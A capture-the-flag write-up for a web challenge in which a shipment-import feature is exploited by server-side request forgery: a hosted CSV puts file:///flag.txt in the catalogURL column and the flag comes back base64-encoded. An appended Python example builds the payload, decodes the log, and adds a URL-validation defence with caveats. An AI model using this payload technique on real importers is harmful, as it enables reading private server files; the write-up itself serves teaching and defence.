![48c20f559459d2db9370b44f10bd0296.png](ae380703fce14c3f912696e10200e8ad.png)

We have access to a few new things now that we're logged in. **Import Shipments** and **Server Configuration** are the two that work on the page.

![10d84a3633f2824219c2f1ff6c558865.png](6e1c7421f25644f1b71149c460321632.png)

**Import Shipments** takes a URL. Passing a valid one like, say, `https://www.tsustyle.com` kicks back:

```
Log:
Resp: <!doctype html>
CSV headers must be : shipmentID,arrival_date,catalogURL
Invalid CSV!
invalid format!
Cannot import records!
```

So we need a **CSV** file that follows those rules. We can write one, for example:

```
shipmentID,arrival_date,catalogURL
1,1,1
```

It's expecting a URL in the **CSV** document, so maybe there's some **SSRF** going on: the server fetches whatever `catalogURL` points at. The challenge says: `Can you read /flag.txt?`. Let's try a `file://` URL in that column:

```
shipmentID,arrival_date,catalogURL
1,1,file:///flag.txt
```

Hosting that on our web server and sending it to the site kicks back:

```
Log:
Resp: shipmentID,arrival_date,catalogURL
1,1,file:///flag.txt
Resp: ZmxhZ3tDMG43cjAxX2k1XzRuX2kxMXVzaTBufQo=
invalid format!
Cannot import records!
```

The first `Resp:` is our own CSV echoed back. The second `Resp:` field looks like base64, which is the content the server read from `file:///flag.txt`. Decoding it:

![035185c1dfa05d79fadc0e384b729bfd.png](fb76ff96301e431294d2d2677262b8df.png)

`flag{C0n7r01_i5_4n_i11usi0n}`

---

Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #web #ssrf #ctf

Related:
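Added example (not the challenge's code or from the original writeup) covering both halves of the above: building the CSV payload and decoding the base64 `Resp:` lines, plus the server-side URL check that would have stopped the `file://` fetch. It assumes the importer behaves as the log above shows (every fetched body comes back as a `Resp:` line, base64 when it is a file read); the function names, the `SAMPLE_LOG` text and the allowlist parameter are this example's own.

```python
import base64
import binascii
import csv
import io
import ipaddress
from urllib.parse import urlsplit

# Header the importer demands, copied from its error message.
HEADER = ["shipmentID", "arrival_date", "catalogURL"]

# Constructed from the log the site returned for the file:/// payload.
SAMPLE_LOG = """Log:
Resp: shipmentID,arrival_date,catalogURL
1,1,file:///flag.txt
Resp: ZmxhZ3tDMG43cjAxX2k1XzRuX2kxMXVzaTBufQo=
invalid format!
Cannot import records!
"""


def build_payload(target: str) -> str:
    """CSV that passes the header check and puts the URL we want the
    server to fetch into catalogURL (e.g. file:///flag.txt)."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(HEADER)
    writer.writerow(["1", "1", target])
    return buf.getvalue()


def extract_responses(log: str) -> list:
    """Return (raw, decoded) for every 'Resp:' line in the importer log.
    decoded is None when the value is not valid base64 (e.g. our echoed CSV)."""
    results = []
    for line in log.splitlines():
        line = line.strip()
        if not line.startswith("Resp:"):
            continue
        token = line[len("Resp:"):].strip()
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            decoded = None
        results.append((token, decoded))
    return results


def is_safe_catalog_url(url: str, allowed_hosts=None) -> bool:
    """Check the importer should run before fetching catalogURL:
    http(s) only, a real hostname, no literal loopback/private/link-local
    IPs, and optionally an allowlist of hosts (hypothetical parameter)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False  # rejects file://, gopher://, etc.
    if not parts.hostname:
        return False
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        ip = None  # hostname is a name, not an IP literal
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local):
        return False
    if allowed_hosts is not None and parts.hostname not in allowed_hosts:
        return False
    return True


if __name__ == "__main__":
    print(build_payload("file:///flag.txt"))
    for raw, decoded in extract_responses(SAMPLE_LOG):
        print(raw, "->", decoded.strip() if decoded else "(not base64)")
    for candidate in ("https://www.tsustyle.com", "file:///flag.txt", "http://127.0.0.1/"):
        print(candidate, is_safe_catalog_url(candidate))
```

The scheme check is the part that matters for this challenge; the IP-literal check is only a partial defence, since a hostname that resolves to an internal address, or an HTTP redirect to one, gets past it. A real fix resolves the name and checks the resulting address before connecting, and disables redirects on the fetch.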